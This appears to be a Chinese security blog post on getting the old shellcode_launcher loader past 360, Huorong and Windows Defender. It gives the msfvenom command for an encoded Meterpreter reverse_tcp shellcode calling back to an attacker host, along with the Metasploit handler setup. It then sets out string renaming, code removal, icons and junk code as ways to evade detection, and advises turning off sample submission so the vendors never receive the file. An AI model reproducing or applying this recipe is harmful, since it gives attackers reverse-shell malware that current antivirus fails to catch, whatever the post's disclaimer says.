✎ 阅读须知

乌鸦安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限，如转载或传播此文章，需保证文章的完整性，未经允许，禁止转载！

本文所提供的工具仅用于学习，禁止用于其他，请在24小时内删除工具文件！！！

老树开新花之shellcode_launcher免杀Windows Defender

免杀效果

静态免杀

动态免杀效果（指的是可执行命令）

1. 准备条件

本文中的免杀方式在我写完文章之后，免杀基本已经失效，毕竟是见光死，所以仅供各位师傅参考，内容上如有错误，希望师傅们能够指正！

本文在测试时，发现可免杀最 新版火绒 、 最新版联网360 、 Windows Defender最新版（关闭可疑文件上传） 。

本文工具已打包至我的 GitHub ，欢迎多多 star ：

https://github.com/crow821/crowsec/tree/master/BypassAv_new_shellcode_launcher

当然，如果你访问GitHub不方便，你也可以在本公众号中回复关键字：免杀 直接下载！

1.1 环境准备

攻击机： mac ip 地址： 10.211.55.2

运行 msf6 进行测试

免杀软件： shellcode_launcher

https://github.com/clinicallyinane/shellcode_launcher/

测试机1： Windows10

ip地址： 10.211.55.3

运行安全防护： 360最新版 、 Windows Defender最新版

测试机2： Windows7 ip地址： 10.211.55.9 运行安全防护： 火绒最新版

测试机3： Windows server2019 ip地址： 192.168.238.145 运行安全防护： 火绒最新版 、 Windows Defender最新版

其中，测试机均在虚拟机环境中。

1.2 shellcode知识介绍

shellcode加载器 和 shellcode 的通俗比喻：

shellcode加载器 是枪， shellcode 是子弹，二者缺一个都无法使用，所以免杀里面有很多关于二者的爱恨情仇，在这里就不多赘述了。

shellcode_launcher 算是一个很古老的 shellcode 加载器，距离今天已经有8年了，在今天 2022.01.16 再次试试（ 2021.06.18 可 免杀360 ），国内主流杀软对其免杀能力如何：

下载到本地：

在这里要保留该文件。

1.3 生成shellcode

首先用 Msfvenom 生成 raw 格式的 shellcode ，当前使用了 shikata_ga_na 编码模块：生成的监听机器为 mac ，ip为 10.211.55.2 ，端口： 1234

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=10.211.55.2 lport=1234  -f raw -o shellcode.raw

因为当前 shellcode 是混淆过的，目前可以过 Windows Defender 和国内主流杀软，所以后面将不会对 shellcode 进行免杀测试，因为对本文来说没有太大意义，当然仅仅是本文而已！

但是这不代表 shellcode 可以过所有 av ，在 VT 上传之后，可以发现，其实有诸多杀软可以直接识别 shikata_ga_nai 编码加密模块特征：

样本链接：https://www.virustotal.com/gui/file/5ee4f74eb9cc7da9fbe61f933739177d9e042dc597da63fe93ec8959f27d3dc8

2. 无杀软的情况测试上线

首先测试下关闭所有杀软的的情况下，测试其能否正常上线：将 raw 文件拷贝到 Windows10 中，并且关闭所有杀软。

mac 上开启 msf 进行监听：

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.211.55.2
LHOST => 10.211.55.2
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.211.55.2:1234

然后执行 shellcode_launcher 加载器：

shellcode_launcher.exe -i shellcode.raw

此时 mac 收到会话，并且可以正常执行命令：

2. 免杀测试

2.1 360联网测试

对 shellcode_launcher 使用 360联网查杀 试试：

直接被杀，直接就发现了当前是木马文件，毕竟这是8年前的加载器！

2.2 免杀360

因为 shellcode_launcher 项目，作者给的不仅有 shellcode_launcher.exe ，还有源代码，因此在这里尝试使用作者的源代码自主打包编译测试下：

使用 vs2012 打开（这部分可百度如何安装 vs2012 ）作者的源代码文件：

在这里不做任何的修改，直接编译文件：

文件编译为 shellcode_launcher.exe 成功，先看下:

这里将两个文件都修改下名字：

shellcode 加载器：

crow_test_av.exe

shellcode ： crow_test_av.raw

在没有进行 360联网查杀 的情况下直接进行测试：

在这里看到，可以过 360 ，而且可以执行命令，在这里我就不主动进行 360联网查杀 了，如果联网查杀的话，就会导致木马样本上传，几分钟之后就会被杀！！！

在这里放一张早期 2021.06.18 测试的图：

2.3 火绒联网测试

在GitHub上直接下载的 shellcode_launcher.exe ，复制进来之后直接被秒杀：

如果直接被杀，那将刚刚手动编译过 360 的木马拿过来试试：复制进行之后，直接又被秒杀！！！

2.4 思考

一般情况下， bypass 火绒的方法是比较容易的，因为火绒主要是静态免杀（这里不绝对），所以在这里过了 360 的没过火绒的话，应该是文件里面的某些关键字命中了火绒的黑名单。那在这里可以简单的分析下：

使用 strings 来提取 crow_test_av.exe 中的字符，命令：

strings.exe crow_test_av.exe > 0115.txt

分析提取字符串的文件，该文件的内容较多，但是在这里面出现了 shellcode_launcher.exe 关键字，而且在源代码中也出现了该关键字：提取字符串：

源代码：

但是在这里关键字实在太多了，短时间内可能无法不太好进行测试，因此在这里将当前的 cpp 代码直接复制一份到火绒环境中去：

复制进行之后，发现当前文件没有被杀：

修改后缀为 exe 之后，也没有被杀：

那在这里可能暂时没有好的方法，只能够直接对作者的源代码进行修改。

2.4 免杀火绒

在当前环境中，使用如下方式进行替换关键字：

将 shellcode_launcher 替换为 hello_crow ：

此时有3处被替换，直接编译为 exe 试试，如果能过火绒的话，那就 bypass 成功，如果不行的话，再继续：

文件改名之后，火绒免杀测试：

此时发现，还是不行，那就继续：

将下面的代码直接注释或删除：

再进行编译，将编译生成的 shellcode_launcher.exe 直接修改为 a.exe ，再次 bypass 火绒测试下：

貌似 byass 成功，测试下能否正常上线：

此时免杀火绒成功。

2.5 Windows Defender

2.5.1 开启 Windows Defender

首先开启 Windows Defender ，在存在 360 和 Windows Defender 的场景中， Windows Defender 会默认关闭，所以在这里要在 360 设置中将其开启：

并且顺手关闭 360 ！！！

Windows Defender 开启之后，一定要记得关闭 Windows Defender 的样本自动上传功能！！！

2.5.2 静态免杀Windows Defender

在 2.4 节中已经免杀了火绒，在这里直接将刚编译出来的 exe 文件拿过来（bypass火绒的 a.exe ）静态扫描测试下：

此时 Windows Defender 认为其是一个安全的文件。那当初直接编译的 crow_test_av.exe 呢？

同样在扫描中，认为其是一个安全的文件，那原始的 shellcode_launcher.exe 是不是也不杀呢？将 shellcode_launcher.exe 直接复制进去看下：

Windows Defender 直接秒杀。

那再试试动态，目前免杀中最难的地方基本全都在动态上。

2.5.3 动态上线Windows Defender测试

在这里将当前 a.exe 以及直接编译的 crow_test_av.exe 放在一个文件夹中，加载相同的 shellcode ，分别进行上线测试：

直接编译的 crow_test_av.exe

在这里可以看到，直接编译后的文件直接可以免杀 Windows Defender

去特征的 a.exe ：

2.5.4 免杀winserver2019 Windows Defender

在 winserver2019 中，开启 火绒最新版 和 Windows Defender最新版 ，动态上线测试通过：

最新版火绒

同样 Windows Defender 关闭自动提交样本：

当前 Windows Defender 病毒库是最新的：

使用同样的方法进行测试，火绒将直接打包的 crow_test_av.exe 秒杀！！！但去特征之后的 a.exe 正常上线运行。

3. 简单修修改改

其实这里简简单单的修改也可以不加。

3.1 添加图标

为当前的项目增加一个图标，按照如图所示，添加资源：

在这里添加 Icon ，并选择导入图标：

在这里选择 ico 文件， ico 可以自行生成： http://www.bitbug.net

将图标文件导入，再编译：

编译完成之后，进行上线测试，此时上线成功：

3.2 添加混淆代码

在这里也可以添加一些混淆代码（早期主要是过火绒）

如图所示，新建项：

添加 c++ 文件，并且修改其名称，然后选择添加：

在里面输入任意的代码：

编译下，生成新的文件，再进行上线测试。

3.3 Bypass 火绒

3.4 Bypass Win Defender & 360

4. 总结

4.1 免杀情况

直接整理为图片吧：（可放大）

4.2 缺点

在本文中，基本没有对作者的源代码进行分析，这里主要是因为篇幅太长，不适合进一步分析，其实可以在作者的基础上延伸一些更加好的方法，本文免杀中存在待优化的问题：

1.使用 msfvenom 生成的 shellcode 会被一部分杀软标记，这些东西其实深入探究源码之后，去除特征并不算难解决。2.在这里看到静态免杀还是比较容易的，但是如果是执行命令等动态操作，基本上都会被优秀的杀软识别，所以在免杀上过动态检测才是研究免杀的关键。

本文在写文章的时候，可能还存在一定的问题，希望各位师傅能够批评指正，不胜感激！